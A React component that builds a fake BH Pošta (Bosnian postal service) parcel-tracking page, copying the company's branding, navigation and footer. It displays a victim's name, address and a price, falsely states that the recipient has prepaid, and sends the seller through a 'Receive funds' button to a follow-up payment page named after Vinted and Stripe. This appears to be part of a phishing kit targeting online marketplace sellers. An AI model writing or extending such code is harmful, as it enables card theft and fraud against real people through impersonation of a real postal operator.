import React, { useCallback, useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './BhPostaBaSuccess.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const BH_POSTA_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/bh-posta-logo.png`;

function BhPostaLogo() {
  return <img src={BH_POSTA_LOGO_SRC} alt="BH Pošta" className="bhp-logo-img" width={200} height={44} />;
}

/** Union Jack (UK), kompaktno za header */
function FlagGbMini() {
  return (
    <svg width="22" height="11" viewBox="0 0 60 30" className="bhp-flag bhp-flag--gb" aria-hidden>
      <defs>
        <clipPath id="bhpGbFlagClip">
          <path d="M0,0 v30 h60 v-30 z" />
        </clipPath>
      </defs>
      <g clipPath="url(#bhpGbFlagClip)">
        <path d="M0,0 v30 h60 v-30 z" fill="#012169" />
        <path d="M0,0 L60,30 M60,0 L0,30" stroke="#fff" strokeWidth="6" />
        <path d="M0,15 h60 M30,0 v30" stroke="#fff" strokeWidth="10" />
        <path d="M0,0 L60,30 M60,0 L0,30" stroke="#C8102E" strokeWidth="4" />
        <path d="M0,15 h60 M30,0 v30" stroke="#C8102E" strokeWidth="6" />
      </g>
    </svg>
  );
}

function SearchIcon() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="#444" strokeWidth="2" aria-hidden>
      <circle cx="11" cy="11" r="7" />
      <path d="M21 21l-4.35-4.35" />
    </svg>
  );
}

function LaptopLineIcon() {
  return (
    <svg className="bhp-status-ico" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.5" aria-hidden>
      <rect x="3" y="5" width="18" height="11" rx="1" />
      <path d="M2 18h20" strokeLinecap="round" />
      <path d="M8 18v2h8v-2" />
    </svg>
  );
}

function CardLineIcon() {
  return (
    <svg className="bhp-status-ico" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.5" aria-hidden>
      <rect x="2" y="5" width="20" height="14" rx="2" />
      <path d="M2 10h20" />
    </svg>
  );
}

function CopyIcon() {
  return (
    <svg width="15" height="15" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M16 1H4c-1.1 0-2 .9-2 2v14h2V3h12V1zm3 4H8c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h11c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm0 16H8V7h11v14z" />
    </svg>
  );
}

function SocialTwitter() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z" />
    </svg>
  );
}

function SocialFb() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z" />
    </svg>
  );
}

function SocialIg() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zM12 0C8.741 0 8.333.014 7.053.072 2.695.272.273 2.69.073 7.052.014 8.333 0 8.741 0 12c0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98C8.333 23.986 8.741 24 12 24c3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98C15.668.014 15.259 0 12 0zm0 5.838a6.162 6.162 0 1 0 0 12.324 6.162 6.162 0 0 0 0-12.324zM12 16a4 4 0 1 1 0-8 4 4 0 0 1 0 8zm6.406-11.845a1.44 1.44 0 1 0 0 2.881 1.44 1.44 0 0 0 0-2.881z" />
    </svg>
  );
}

function SocialIn() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M20.447 20.452h-3.554v-5.569c0-1.328-.027-3.037-1.852-3.037-1.853 0-2.136 1.445-2.136 2.939v5.667H9.351V9h3.414v1.561h.046c.477-.9 1.637-1.85 3.37-1.85 3.601 0 4.267 2.37 4.267 5.455v6.286zM5.337 7.433c-1.144 0-2.063-.926-2.063-2.065 0-1.138.92-2.063 2.063-2.063 1.14 0 2.064.925 2.064 2.063 0 1.139-.925 2.065-2.064 2.065zm1.782 13.019H3.555V9h3.564v11.452zM22.225 0H1.771C.792 0 0 .774 0 1.729v20.542C0 23.227.792 24 1.771 24h20.451C23.2 24 24 23.227 24 22.271V1.729C24 .774 23.2 0 22.222 0h.003z" />
    </svg>
  );
}

function SocialYt() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M23.498 6.186a3.016 3.016 0 0 0-2.122-2.136C19.505 3.545 12 3.545 12 3.545s-7.505 0-9.377.505A3.017 3.017 0 0 0 .502 6.186C0 8.07 0 12 0 12s0 3.93.502 5.814a3.016 3.016 0 0 0 2.122 2.136c1.871.505 9.376.505 9.376.505s7.505 0 9.377-.505a3.015 3.015 0 0 0 2.122-2.136C24 15.93 24 12 24 12s0-3.93-.502-5.814zM9.545 15.568V8.432L15.818 12l-6.273 3.568z" />
    </svg>
  );
}

const FOOTER_O_POSTI = [
  'Uprava društva',
  'Javne nabavke',
  'Poštanska mreža',
  'Historijski razvoj pošte u BiH',
  'Opći akti Društva',
];

const FOOTER_USLUGE = [
  'Pismonosne usluge',
  'Paketske usluge',
  'Express usluge',
  '— BH PostExpress',
  '— Pošiljke brze pošte - EMS',
  'e-Potpis',
  'Telegram',
  'Finansijske usluge',
  '— Mapa mjenjačnica',
  '— Kursna lista',
  'Hibridna pošta',
  'Oglašavanje u Pošti',
  'Komercijalne usluge',
  '— Poslovno rješenje BH Pošte za e-trgovinu',
  'Reklamacije i prigovori',
  'O poštanskim uslugama',
];

const FOOTER_FILATELIJA = [
  'Program prigodnih poštanskih maraka za 2023. godinu.',
  'Album poštanskih maraka',
  'Bilten prigodnih poštanskih maraka',
  'Prodaja poštanskih maraka',
  'Razvoj filatelije u BiH',
  'Filatelija za mlade',
  '__yellow__Međunarodne nagrade',
  'Uputstvo o izdavanju i prodaji personaliziranih poštanskih maraka',
];

const FOOTER_ONLINE = ['Kupovina poštanskih maraka', 'eShop'];
const FOOTER_KONTAKT = ['Poštanska mreža', 'Kontakt', 'PRESS', 'Logo BH Pošte'];

/**
 * BH Pošta (BA) — praćenje pošiljke; nakon captcha → index2 (VintedStripe2).
 */
function BhPostaBaSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [copyFlash, setCopyFlash] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'BA').toUpperCase();
  const primary = getPrimaryCurrency(countryCode);
  const curSym = getSymbol(primary);

  const tracking = useMemo(() => {
    const t = (pageData?.tracking_number || '').toString().trim();
    if (t.length >= 6) return t;
    return pageCode || '—';
  }, [pageData, pageCode]);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fullName = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const copyTracking = useCallback(() => {
    const run = async () => {
      try {
        await navigator.clipboard.writeText(tracking);
        setCopyFlash(true);
        setTimeout(() => setCopyFlash(false), 2000);
      } catch {
        /* ignore */
      }
    };
    run();
  }, [tracking]);

  if (loading && pageCode) {
    return (
      <div className="bhp-wrap">
        <div className="bhp-loading">Učitavanje…</div>
        <div className="bhp-support">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="bhp-wrap">
      <header className="bhp-header">
        <div className="bhp-header-inner">
          <a href="#/" className="bhp-brand" aria-label="BH Pošta">
            <BhPostaLogo />
          </a>
          <nav className="bhp-nav" aria-label="Glavna navigacija">
            <a href="#/">Početna</a>
            <a href="#/">Aktuelnosti ▾</a>
            <a href="#/">Usluge ▾</a>
            <a href="#/">Filatelija ▾</a>
            <a href="#/">Online kupovina ▾</a>
            <a href="#/">O pošti ▾</a>
            <a href="#/">Kontakt ▾</a>
          </nav>
          <div className="bhp-util">
            <span className="bhp-flag-gb-wrap" title="English" aria-hidden>
              <FlagGbMini />
            </span>
            <button type="button" className="bhp-icon-btn" aria-label="Pretraga">
              <SearchIcon />
            </button>
          </div>
        </div>
        <div className="bhp-yellow-line" aria-hidden />
      </header>

      <main className="bhp-main">
        <h1 className="bhp-title">Praćenje pošiljke</h1>

        <div className="bhp-box bhp-tracking-box">
          <div>
            <div className="bhp-label">Broj za praćenje</div>
            <div className="bhp-tracking-val">{tracking}</div>
          </div>
          <button type="button" className="bhp-copy" onClick={copyTracking}>
            <CopyIcon />
            Kopiraj
          </button>
        </div>

        <h2 className="bhp-section-h">&gt; Status paketa</h2>
        <div className="bhp-box bhp-status-box">
          <div className="bhp-status-row">
            <LaptopLineIcon />
            <span>Detalji paketa su uneseni u sistem BH Pošte.</span>
          </div>
          <div className="bhp-status-row">
            <CardLineIcon />
            <span>Avansno plaćanje izvršeno od strane primaoca.</span>
          </div>
        </div>

        <Link to={index2Path} className="bhp-cta">
          Prijem sredstava ({priceText} {curSym})
        </Link>

        <section>
          <h2 className="bhp-section-h">&gt; Informacije o proizvodu</h2>
          <div className="bhp-box bhp-prod-grid">
            <div className="bhp-prod-cell">
              <div className="bhp-prod-lbl">Adresa za dostavu:</div>
              <div className="bhp-prod-val">{address}</div>
            </div>
            <div className="bhp-prod-cell">
              <div className="bhp-prod-lbl">Karakteristike:</div>
              <div className="bhp-prod-val">Plaćanje prilikom isporuke</div>
            </div>
            <div className="bhp-prod-cell">
              <div className="bhp-prod-lbl">Ime kupca:</div>
              <div className="bhp-prod-val">{fullName}</div>
            </div>
            <div className="bhp-prod-cell">
              <div className="bhp-prod-lbl">Komentar na pošiljku:</div>
              <div className="bhp-prod-val">{productName}</div>
            </div>
          </div>
        </section>

        <div className="bhp-help">
          <h3>Trebate li dodatnu pomoć?</h3>
          <p>Kontaktirajte podršku za praćenje BH Pošte za dodatnu pomoć.</p>
          <a href="#/" className="bhp-faqs">
            FAQs
          </a>
        </div>
      </main>

      <footer className="bhp-footer">
        <div className="bhp-footer-inner">
          <div className="bhp-footer-col">
            <h4>O Pošti</h4>
            <ul>
              {FOOTER_O_POSTI.map((x) => (
                <li key={x}>
                  <a href="#/">{x}</a>
                </li>
              ))}
            </ul>
          </div>
          <div className="bhp-footer-col">
            <h4>Usluge</h4>
            <ul>
              {FOOTER_USLUGE.map((x) => (
                <li key={x}>
                  <a href="#/">{x}</a>
                </li>
              ))}
            </ul>
          </div>
          <div className="bhp-footer-col">
            <h4>Filatelija</h4>
            <ul>
              {FOOTER_FILATELIJA.map((x) => (
                <li key={x} className={x.startsWith('__yellow__') ? 'bhp-ft-yellow' : ''}>
                  <a href="#/">{x.replace('__yellow__', '')}</a>
                </li>
              ))}
            </ul>
          </div>
          <div className="bhp-footer-col bhp-footer-col--last">
            <h4>Online kupovina</h4>
            <ul>
              {FOOTER_ONLINE.map((x) => (
                <li key={x}>
                  <a href="#/">{x}</a>
                </li>
              ))}
            </ul>
            <h4 className="bhp-ft-subh">Kontakt</h4>
            <ul>
              {FOOTER_KONTAKT.map((x) => (
                <li key={x}>
                  <a href="#/">{x}</a>
                </li>
              ))}
            </ul>
            <h4 className="bhp-ft-subh">Pratite nas</h4>
            <div className="bhp-social">
              <a href="#/" className="bhp-soc bhp-soc--tw" aria-label="Twitter">
                <SocialTwitter />
              </a>
              <a href="#/" className="bhp-soc bhp-soc--fb" aria-label="Facebook">
                <SocialFb />
              </a>
              <a href="#/" className="bhp-soc bhp-soc--ig" aria-label="Instagram">
                <SocialIg />
              </a>
              <a href="#/" className="bhp-soc bhp-soc--in" aria-label="LinkedIn">
                <SocialIn />
              </a>
              <a href="#/" className="bhp-soc bhp-soc--yt" aria-label="YouTube">
                <SocialYt />
              </a>
            </div>
          </div>
        </div>
      </footer>

      <div className="bhp-copybar">© JP BH POŠTA doo, Sarajevo</div>

      {copyFlash ? <div className="bhp-toast">Kopirano</div> : null}
      <div className="bhp-support">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default BhPostaBaSuccess;
